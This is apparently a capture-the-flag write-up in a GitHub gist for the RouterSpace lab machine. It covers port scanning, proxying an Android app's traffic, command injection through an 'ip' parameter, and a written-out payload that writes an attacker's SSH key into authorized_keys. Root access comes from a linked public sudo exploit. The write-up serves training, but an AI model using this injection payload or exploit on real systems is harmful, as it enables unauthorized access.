Skip to content

Instantly share code, notes, and snippets.

@0xEmbo

0xEmbo/RouterSpace.md Secret

Created July 9, 2022 16:43
Show Gist options
  • Save 0xEmbo/00f90638638206660135149f94396f6d to your computer and use it in GitHub Desktop.
Save 0xEmbo/00f90638638206660135149f94396f6d to your computer and use it in GitHub Desktop.
Download ZIP
Raw
RouterSpace.md

10.10.11.148

Foothold

Nmap

Nmap scan report for 10.10.11.148                                     
Host is up (0.15s latency).                                           
Not shown: 998 filtered ports                                         
PORT   STATE SERVICE VERSION                                          
22/tcp open  ssh     (protocol 2.0)                                   
| fingerprint-strings:                                                
|   NULL:                                                             
|_    SSH-2.0-RouterSpace Packet Filtering V1                         
| ssh-hostkey:                                                        
|   3072 f4:e4:c8:0a:a6:af:66:93:af:69:5a:a9:bc:75:f9:0c (RSA)        
|   256 7f:05:cd:8c:42:7b:a9:4a:b2:e6:35:2c:c4:59:78:02 (ECDSA)
|_  256 2f:d7:a8:8b:be:2d:10:b0:c9:b4:29:52:a8:94:24:78 (ED25519)
80/tcp open  http
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-90752 
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 83
|     ETag: W/"53-1CPF2lTAVDqjw0ulBsW5R961pkE"
|     Date: Wed, 06 Jul 2022 19:33:03 GMT
|     Connection: close
|     Suspicious activity detected !!! {RequestID: gDdeM 7Oi rA q Q dB 1qhNmgI }
|   GetRequest: 
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-15939 
|     Accept-Ranges: bytes
|     Cache-Control: public, max-age=0
|     Last-Modified: Mon, 22 Nov 2021 11:33:57 GMT
|     ETag: W/"652c-17d476c9285"
|     Content-Type: text/html; charset=UTF-8
|     Content-Length: 25900
|     Date: Wed, 06 Jul 2022 19:33:01 GMT
|     Connection: close
|     <!doctype html>
|     <html class="no-js" lang="zxx">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>RouterSpace</title>
|     <meta name="description" content="">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="stylesheet" href="css/bootstrap.min.css">
|     <link rel="stylesheet" href="css/owl.carousel.min.css"> 
|     <link rel="stylesheet" href="css/magnific-popup.css">
|     <link rel="stylesheet" href="css/font-awesome.min.css"> 
|     <link rel="stylesheet" href="css/themify-icons.css">
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-33000 
|     Allow: GET,HEAD,POST
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 13
|     ETag: W/"d-bMedpZYGrVt1nR4x+qdNZ2GqyRo"
|     Date: Wed, 06 Jul 2022 19:33:02 GMT
|     Connection: close
|     GET,HEAD,POST
|   RTSPRequest, X11Probe: 
|     HTTP/1.1 400 Bad Request
|_    Connection: close
|_http-title: RouterSpace

We have two open ports, ssh on 22 and http on 80, and their versions have no serious vulnerabilities. Nothing to do with SSH for now, so lets enumerate port 80.

HTTP Enumeration

![[Pasted image 20220708232149.png]] Going to http://10.10.11.148/ we see a static html page, but there is a download button that downloads an APK file. ![[Pasted image 20220708232113.png]]

Now we need to know what this app is doing so we lets install it on an android enumator and configure burpsuite so it listen on all interfaces to intercept the traffic from the emulator. We can use any android emulator you like, i will use genymotion for this one.

First, we will configure burp to listen on all interfaces on port 8081. ![[Pasted image 20220708232808.png]]

Next, we need to configure proxy setting from Settings -> Wi-Fi -> Modify Network -> Proxy on the emulator. ![[Pasted image 20220708233000.png]]

Last step is to drag and drop the APK file to the emulator to install it. The application has ony "Check Status" button, when we click it and navigate to HTTP history tab in burpsuite we see a POST request to http://routerspace.htb with no response (because our machine doesn't know how to resolve routerspace.htb) ![[Pasted image 20220708233809.png]]

So lets add this hostname to hosts file. Now we see a response. ![[Pasted image 20220708234414.png]] ![[Pasted image 20220708233534.png]]

Lets send this request to the repeater to play with. The first thing came to my mind is that maybe the machine executes system command on the ip parameter like ping -c1 <ip> to check whether the specified ip is up or not, so i tried injecting whoami in the ip parameter. ![[Pasted image 20220708234702.png]] And it works and i am paul.

I have tried to get a reverse shell in various ways but failed, so i just put my ssh public key in authorized_keys file and SSHed into the machine with user paul.

Payload: ;echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDVd5Cr7JucC1oFvizD2p9lBPCGuWR7H7COIYtZnrwLJomv1jvt5P26ayTOrB44HkaPsFJlBX0r+IsUdfbg0C0THEWXK2YYuik5drXUapmyhoh+o/2+u/KPtdq6+XjaUQ712mXXK1pSC7QpHjTcyVjyvr0zjAUW+MZwo0uUsLaDa/wsoWoFDoJ0iZqtMw/uz9WtOywKMu425eRs5C2us1AebpAMn7FO3tDLPLgSv4z6XUfYDR7VtBCZNKiX6ob2VfEnKSNhPiMiGzWEnrEZec6Gb4jpcMsxazmHzN5lcRBvILaacRgYyIJom5aWI7F9YX5e+IIBj03f+VbMU4hgbZw7 > ~/.ssh/authorized_keys; ![[Pasted image 20220709010431.png]]

Getting root

I ran linpeas.sh and quickly found that the sudo version may be vulnerable. ![[Pasted image 20220709021315.png]]

So i searched for public exploits for this version and found this repository.

https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit

I cloned this repo and couldn't transfer the files to the machine so i copied and pasted every file.

Finally, run make then ./exploit and we are root on the box! ![[Pasted image 20220709021724.png]]

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment